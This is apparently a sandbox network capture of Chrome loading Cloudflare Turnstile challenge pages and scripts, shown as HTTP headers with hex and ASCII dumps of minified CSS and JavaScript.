                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                          Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                          Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                          Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          47192.168.2.1649791104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:09 UTC796OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://wv.itzraterbi.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:10 UTC1362INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:09 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 26678
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                          cross-origin-embedder-policy: require-corp
                                                                                                                          cross-origin-opener-policy: same-origin
                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                          origin-agent-cluster: ?1
                                                                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                          referrer-policy: same-origin
                                                                                                                          document-policy: js-profiling
                                                                                                                          2024-12-19 16:09:10 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 38 61 37 63 63 37 61 63 65 34 31 64 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: Server: cloudflareCF-RAY: 8f48a7cc7ace41d9-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:10 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                          2024-12-19 16:09:10 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          48192.168.2.1649792104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:11 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f48a7cc7ace41d9&lang=auto HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:11 UTC331INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:11 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 113867
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7d738668ce0-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:11 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 69
                                                                                                                          Data Ascii: ted%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_feedback_description":"Send%20Feedback","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","ti
                                                                                                                          2024-12-19 16:09:11 UTC1369INData Raw: 2c 67 36 2c 67 63 2c 67 64 2c 67 65 2c 67 6f 2c 67 7a 2c 67 44 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 38 37 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 32 36 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 36 31 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 39 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 35 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 34 31 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 33 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67
                                                                                                                          Data Ascii: ,g6,gc,gd,ge,go,gz,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(987))/1+parseInt(gI(1826))/2+parseInt(gI(1061))/3*(-parseInt(gI(1399))/4)+-parseInt(gI(1245))/5*(parseInt(gI(1041))/6)+parseInt(gI(1453))/7+parseInt(g
